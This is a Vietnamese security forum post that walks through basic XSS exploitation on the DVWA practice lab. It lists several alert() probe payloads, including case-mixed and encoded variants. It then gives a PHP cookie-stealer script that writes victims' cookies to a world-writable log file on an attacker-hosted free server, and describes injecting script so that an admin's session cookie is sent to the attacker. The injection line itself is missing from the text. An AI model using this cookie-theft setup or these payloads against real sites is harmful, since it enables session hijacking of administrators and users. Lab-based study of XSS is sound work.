XSS Hướng cách khai thác lỗ hổng XSS (cơ bản).

StarWar

Internship/Fresher
Dec 8, 2013
28
0
0
Khai thác lỗ hổng XSS với Xenotix (DVWA)

Xenotix XSS Exploit Framework
là một công cụ thử nghiệm xâm nhập để phát hiện và khai thác lỗ hổng XSS trong ứng dụng web. Công cụ này có thể tiêm các đoạn mã và một trang web mà nó có khả năng bị tổn thương tới lỗ hổng XSS. Nó là cơ bản là một danh sách các payload dựa trên các XSS Scanner và XSS Exploitation. Nó cung cấp cho người thử nghiệm xâm nhập khả năng để kiểm tra tất cả các XSS payloads có sẵn trong danh sách để tấn công ,ứng dụng web cho quá trình kiểm tra lỗ hổng XSS. Công cụ hỗ trợ cả chế độ tự động và chế độ bằng tay. XSS Exploit Framework bao gồm các công cụ XSS encoder, XSS keystroke logger, Executable Drive-by downloader, XSS Reverse Shell và XSS DDoSer.



****Dưới đây là cách khai thác lỗ hổng XSS (cơ bản).

**Phần 1:Test lỗi.


1.Đầu tiên ta cần cài đặt DVWA.Link hướng dẫn ở đây http://svuit.com/showthread.php?109-Tạo-Penetration-testing-lab-with-DVWA.​
2.Sau đó ta vào thư mục cài đặt DVWA
Tìm file .htaccess edit lai :​
# Limit access to localhost
<Limit GET POST PUT>
order deny,allow
deny from all ---------> Sửa thành allow from all
allow from 127.0.0.1
</Limit>
3.Tìm file index.php theo đường dẫn sau: dvwa\vulnerabilities\xss-s\index.phptìm:​
<div class=\"body_padded\"> -----> <textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"50\"></textarea></td>
sửa maxlength từ 50 thành 200 nhu:​
<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"200\"></textarea></td>
4.Vào web browser mở http://www.localhost/dvwa login vs username: admin password: password(mặc định nếu mốn ta có thể thay đổi sau).​
5.Vào setup->Creat/reset database để tạo mới database nếu thành công thì sẽ có thông báo: database has been created....​
6.Chỉnh DVWA security từ high xuống low.Đây là mức bảo mật thấp nhất.Ta nên bắt đầu từ đây.​
7.Vào xss storage
8.Sử dụng một số đoạn script cơ bản để soát lỗi xss cho website:
<script>alert("XSS")</script>

"><script>alert("XSS")</script>

"><script>alert(String.fromCharCode(88,83,83)</script>

'><script>alert("XSS")</script>

'><script>alert(String.fromCharCode(88,83,83)</script>

<ScRIPt>aLeRT("XSS")</ScRIPt>

<ScRIPt><aLeRT(String.fromCharCode(88,83,83)</ScRIPt>

Sau khi phát hiên ra những lỗ hổng ta chuyển qua phần 2.

Phần 2.Sau khi phát hiện ra lỗi ta tấn công bang css


12*1.Tạo file cc.php để lấy cookies
Nội dung file cc.php nhu sau:​
Code:
<?php[/INDENT]
[INDENT]$cookie=$HTTP_GET_VAR["cookie"];  [COLOR="#0000FF"]//Lấy cookie từ địa chỉ hiện tại và lưu trữ cookie trong biến $cookie[/COLOR][/INDENT]
[INDENT]$steal=fopen("logs.txt","a");              [COLOR="#0000FF"] //Mở cookiefile để đính kèm các cookie lấy được[/COLOR][/INDENT]
[INDENT]fwrite($steal,$cookie."\n");                [COLOR="#0000FF"]//Viết lại những cookie lấy được lưu trong file $steal[/COLOR][/INDENT]
[INDENT]fclose($steal);                                 [COLOR="#0000FF"]//Đóng lại cookiefiles.[/COLOR][/INDENT]
[INDENT]?>
file này có nhiệm vụ lấy cookies và ghi thông tin lên file logs.txt
Sau đó tạo file logs.txt.​
Lưu ý phải chmod file logs.text về 777
12*2.Up các file cc.php và logs.text lên host
(Lưu ý đây là host do attacker tạo ra. Các bạn có thể tạo host free trên trang www.000webhost.com)​
12*3.Khai thác lỗ hổng css
Chèn đoạn script độc vào textbox rồi gửi đi.​
Giả sử ta upload 2 file lên host của site có địa chỉ như sau: http://www.xss.com thì đoạn script có dạng như sau:​

Chèn đoạn mã đó vào site dính lỗi xss.Khi admin view site thi cookie se duoc gui ve cho attacker.​
Kiểm tra file log trên web.​
Bước cuối cùng.Khai thác cookies lấy được.​
 
Last edited by a moderator:

Similar Threads

About us

  • Securityzone.vn là một trang web chuyên về an ninh mạng và công nghệ thông tin. Trang web này cung cấp các bài viết, tin tức, video, diễn đàn và các dịch vụ liên quan đến lĩnh vực này. Securityzone.vn là một trong những cộng đồng IT lớn và uy tín tại Việt Nam, thu hút nhiều người quan tâm và tham gia. Securityzone.vn cũng là nơi để các chuyên gia, nhà nghiên cứu, sinh viên và người yêu thích an ninh mạng có thể trao đổi, học hỏi và chia sẻ kiến thức, kinh nghiệm và giải pháp về các vấn đề bảo mật trong thời đại số.

Quick Navigation

User Menu